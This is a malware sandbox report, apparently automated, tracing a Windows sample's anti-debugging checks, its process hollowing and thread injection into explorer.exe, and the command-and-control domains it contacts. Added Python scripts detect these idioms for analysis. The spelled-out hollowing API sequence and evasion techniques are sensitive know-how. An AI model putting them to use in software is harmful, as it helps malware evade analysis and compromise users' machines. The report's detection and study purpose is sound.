Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h] 29_2_6B60B581
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h] 29_2_6B60B581
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h] 29_2_6B571DB5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h] 29_2_6B571DB5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h] 29_2_6B571DB5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5735A1 mov eax, dword ptr fs:[00000030h] 29_2_6B5735A1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618C75 mov eax, dword ptr fs:[00000030h] 29_2_6B618C75
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h] 29_2_6B55FC77
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h] 29_2_6B55FC77
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h] 29_2_6B55FC77
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h] 29_2_6B55FC77
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B585C70 mov eax, dword ptr fs:[00000030h] 29_2_6B585C70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h] 29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618450 mov eax, dword ptr fs:[00000030h] 29_2_6B618450
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56746D mov eax, dword ptr fs:[00000030h] 29_2_6B56746D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h] 29_2_6B55FC01
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h] 29_2_6B55FC01
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h] 29_2_6B55FC01
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h] 29_2_6B55FC01
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h] 29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B562430 mov eax, dword ptr fs:[00000030h] 29_2_6B562430
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B562430 mov eax, dword ptr fs:[00000030h] 29_2_6B562430
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B61740D mov eax, dword ptr fs:[00000030h] 29_2_6B61740D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B61740D mov eax, dword ptr fs:[00000030h] 29_2_6B61740D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B61740D mov eax, dword ptr fs:[00000030h] 29_2_6B61740D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B544439 mov eax, dword ptr fs:[00000030h] 29_2_6B544439
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618C14 mov eax, dword ptr fs:[00000030h] 29_2_6B618C14
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57BC2C mov eax, dword ptr fs:[00000030h] 29_2_6B57BC2C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542CDB mov eax, dword ptr fs:[00000030h] 29_2_6B542CDB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6B57CCC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6B57CCC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6B57CCC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6B57CCC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6014FB mov eax, dword ptr fs:[00000030h] 29_2_6B6014FB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618CD6 mov eax, dword ptr fs:[00000030h] 29_2_6B618CD6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54649B mov eax, dword ptr fs:[00000030h] 29_2_6B54649B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54649B mov eax, dword ptr fs:[00000030h] 29_2_6B54649B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B619CB3 mov eax, dword ptr fs:[00000030h] 29_2_6B619CB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B541480 mov eax, dword ptr fs:[00000030h] 29_2_6B541480
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B544CB0 mov eax, dword ptr fs:[00000030h] 29_2_6B544CB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57D4B0 mov eax, dword ptr fs:[00000030h] 29_2_6B57D4B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h] 29_2_6B604496
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Md0q201V1D.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\21.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\gbhudtb Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 0_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D440
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B576B90 rdtsc 29_2_6B576B90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_1_004026C8 LdrLoadDll, 3_1_004026C8
Source: C:\Users\user\AppData\Local\Temp\B096.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 0_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D440
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 0_2_004266D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004266D0
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 14_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_0041D440
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 14_2_004266D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_004266D0
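The signatures above rest on three 32-bit idioms: reads of fs:[30h] (the TEB slot holding the PEB pointer; PEB+0x02 is BeingDebugged, the byte IsDebuggerPresent returns), a follow-up read of that byte, and rdtsc for timing. The scanner below is an added example, not part of the report or of any sandbox product: it greps raw code bytes for those encodings and upgrades a PEB read to a BeingDebugged check only when a [eax+2] read follows within a short window. The opcode encodings are taken from the Intel manual; the sample bytes are constructed for the example, not extracted from the malware.

```python
"""Static scan for the 32-bit anti-debugging idioms listed above.

Added example, not part of the sandbox report. On 32-bit Windows fs:[0x30]
is the TEB slot holding the PEB pointer, and PEB+0x02 is BeingDebugged, the
byte that IsDebuggerPresent() returns. rdtsc is the usual timing probe.
"""
from __future__ import annotations

import re

# Opcode encodings (Intel SDM; 32-bit code only):
#   64 A1 30 00 00 00        mov eax, dword ptr fs:[0x30]   (short form)
#   64 8B /r 30 00 00 00     mov r32, dword ptr fs:[0x30]   (ModRM form;
#                            05=eax 0D=ecx 15=edx 1D=ebx 35=esi 3D=edi)
#   0F 31                    rdtsc
PATTERNS = [
    ("peb_read", re.compile(rb"\x64\xA1\x30\x00\x00\x00")),
    ("peb_read", re.compile(rb"\x64\x8B[\x05\x0D\x15\x1D\x35\x3D]\x30\x00\x00\x00")),
    ("rdtsc", re.compile(rb"\x0F\x31")),
]

# Follow-ups that read PEB.BeingDebugged once the PEB pointer sits in eax:
#   0F B6 40 02   movzx eax, byte ptr [eax+2]
#   80 78 02 00   cmp   byte ptr [eax+2], 0
BEING_DEBUGGED = re.compile(rb"\x0F\xB6\x40\x02|\x80\x78\x02\x00")
FOLLOW_WINDOW = 16  # bytes after the PEB read in which the [eax+2] read must appear


def scan(code: bytes, base: int = 0) -> list[tuple[int, str]]:
    """Return (virtual address, idiom) pairs sorted by address.

    A PEB read is reported as 'peb_being_debugged' when a [eax+2] read
    follows within FOLLOW_WINDOW bytes; other PEB reads stay 'peb_read',
    because the PEB is also read for benign reasons (e.g. walking PEB.Ldr).
    """
    hits = []
    for name, pat in PATTERNS:
        for m in pat.finditer(code):
            label = name
            if name == "peb_read" and BEING_DEBUGGED.search(code, m.end(), m.end() + FOLLOW_WINDOW):
                label = "peb_being_debugged"
            hits.append((base + m.start(), label))
    return sorted(hits)


# Constructed sample (not taken from the malware): an IsDebuggerPresent-style
# check, a benign PEB.Ldr walk and an rdtsc probe, as 32-bit machine code.
SAMPLE = bytes.fromhex(
    "55 8B EC"               # push ebp; mov ebp, esp
    "64 A1 30 00 00 00"      # mov eax, fs:[0x30]
    "0F B6 40 02"            # movzx eax, byte ptr [eax+2]   -> BeingDebugged
    "85 C0 75 05"            # test eax, eax; jnz +5
    "64 8B 0D 30 00 00 00"   # mov ecx, fs:[0x30]
    "8B 49 0C"               # mov ecx, [ecx+0xC]            -> PEB.Ldr (benign)
    "0F 31"                  # rdtsc
    "8B D8"                  # mov ebx, eax
    "5D C3"                  # pop ebp; ret
)

if __name__ == "__main__":
    for va, idiom in scan(SAMPLE, base=0x6B540000):
        print(f"{va:08X} {idiom}")
```

A byte grep is position-unaware: the two-byte rdtsc encoding can also occur inside an immediate or displacement, so on real binaries run the patterns over a disassembler's instruction stream (e.g. capstone) rather than raw bytes, and treat plain PEB reads as context, not as a verdict.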

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Benign Windows process drops PE files
Source: C:\Windows\explorer.exe File created: C066.exe.10.dr
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Md0q201V1D.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\Md0q201V1D.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\21.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\21.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\gbhudtb Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\gbhudtb Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Injects a PE file into a foreign process
Source: C:\Users\user\AppData\Roaming\gbhudtb Memory written: C:\Users\user\AppData\Roaming\gbhudtb base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\gbhudtb Memory written: C:\Users\user\AppData\Roaming\gbhudtb base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 14_2_02BE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 14_2_02BE0110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\Md0q201V1D.exe Thread created: C:\Windows\explorer.exe EIP: 4DE1920
Source: C:\Users\user\AppData\Local\Temp\21.exe Thread created: unknown EIP: 2D61920
Source: C:\Users\user\AppData\Roaming\gbhudtb Thread created: unknown EIP: 5B71920
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Thread created: unknown EIP: 5AB19C0
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe Thread created: unknown EIP: 5B01920
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\B096.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\B096.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base address: 400000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Md0q201V1D.exe Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
Source: C:\Users\user\AppData\Roaming\gbhudtb Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
Source: C:\Users\user\AppData\Local\Temp\21.exe Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
Source: C:\Users\user\AppData\Roaming\gbhudtb Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
Source: C:\Users\user\AppData\Local\Temp\B096.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
Source: C:\Users\user\AppData\Local\Temp\B096.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 29_2_6B57E730
Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000000.297627398.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.297850308.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.302532259.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh
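The injection signatures in this section are individually weak (a suspended process creation, a write beginning with 4D5A, an unmapped section, a remote thread) but together they form the classic hollowing chain, and the static API list on gbhudtb's function 14_2_02BE0110 (CreateProcessA ... NtUnmapViewOfSection ... WriteProcessMemory, SetThreadContext, ResumeThread) is that chain spelled out. The script below is an added example, not the report's or any vendor's code: it parses report lines of the shapes quoted above, correlates them per (source, target) pair and emits a verdict. The line regexes, the API skeleton and the scoring rules are this example's own assumptions; the sample input is copied from this section.

```python
"""Correlate a sandbox report's injection lines into per (source, target) verdicts.

Added example, not part of the report. The line shapes are those quoted in
this section; the scoring rules and API skeleton are assumptions of this
example, not the sandbox's own logic.
"""
from __future__ import annotations

import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Behavioural lines: "Source: <src> <event>: <target> <rest>". A target path
# is read up to its ".exe" so that paths with spaces survive; targets without
# ".exe" (e.g. "gbhudtb", "unknown") fall back to a single token.
EVENT = re.compile(
    r"^Source:\s+(?P<src>\S+)\s+"
    r"(?P<event>Process created|Section unmapped|Memory written|Thread created):\s+"
    r"(?P<tgt>[A-Za-z]:\\.*?\.exe\b|\S+)(?P<rest>.*)$"
)
# Static lines: "Source: <src> Code function: <id> <api>,<api>,... <id>".
API_CHAIN = re.compile(
    r"^Source:\s+(?P<src>\S+)\s+Code function:\s+\S+\s+(?P<apis>[\w,]+)\s+\S+$"
)

# Ordered API skeleton of classic process hollowing; each slot lists the
# alternatives commonly seen. Unrelated calls may sit between the slots.
HOLLOW_SKELETON = [
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "NtSetContextThread"},
    {"ResumeThread", "NtResumeThread"},
]


def basename(path: str) -> str:
    return PureWindowsPath(path).name or path


def has_ordered_chain(apis: list[str], skeleton=HOLLOW_SKELETON) -> bool:
    """True when every skeleton slot is matched, in order, by the call list."""
    slot = 0
    for api in apis:
        if slot < len(skeleton) and api in skeleton[slot]:
            slot += 1
    return slot == len(skeleton)


def correlate(lines) -> dict[tuple[str, str], list[str]]:
    events = defaultdict(set)  # (src, tgt) -> event tags
    static_hollowers = set()   # sources whose code contains the API chain
    for line in lines:
        line = line.strip()
        m = EVENT.match(line)
        if m:
            tag = m["event"]
            # 4D5A is "MZ": a PE image being written at the image base.
            if tag == "Memory written" and "value starts with: 4D5A" in m["rest"]:
                tag = "PE header written"
            events[(basename(m["src"]), basename(m["tgt"]))].add(tag)
            continue
        m = API_CHAIN.match(line)
        if m and has_ordered_chain(m["apis"].strip(",").split(",")):
            static_hollowers.add(basename(m["src"]))

    verdicts = {}
    for (src, tgt), tags in events.items():
        found = []
        # "Process created" lines in this section come from the
        # suspended-mode signature, so creation implies CREATE_SUSPENDED.
        if {"Process created", "Section unmapped"} <= tags:
            found.append("process hollowing")
        if {"Process created", "PE header written"} <= tags:
            found.append("PE overwrite of spawned process")
        if "Thread created" in tags and "Process created" not in tags:
            found.append("thread injected into existing process")
        if src in static_hollowers:
            found.append("static hollowing API chain")
        if found:
            verdicts[(src, tgt)] = found
    return verdicts


# Sample input: lines copied from this section of the report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\gbhudtb Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb",
    r"Source: C:\Users\user\AppData\Roaming\gbhudtb Memory written: C:\Users\user\AppData\Roaming\gbhudtb base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 14_2_02BE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 14_2_02BE0110",
    r"Source: C:\Users\user\AppData\Local\Temp\B096.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\B096.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe base address: 400000",
    r"Source: C:\Users\user\Desktop\Md0q201V1D.exe Thread created: C:\Windows\explorer.exe EIP: 4DE1920",
    r"Source: C:\Users\user\Desktop\Md0q201V1D.exe Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'",
]

if __name__ == "__main__":
    for pair, found in correlate(SAMPLE_LINES).items():
        print(pair, "->", ", ".join(found))
```

On this sample the self-spawning gbhudtb pair scores as a PE overwrite backed by the static chain, B096.exe against aspnet_state.exe as hollowing proper, and Md0q201V1D.exe against explorer.exe as a thread planted in an already running process, which is the explorer.exe that then resolves the C2 domains listed at the top of this section. The source path is taken as one token, so a source under a directory containing spaces would need the same ".exe" heuristic as the target.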

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\B096.exe Queries volume information: C:\Users\user\AppData\Local\Temp\B096.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B096.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
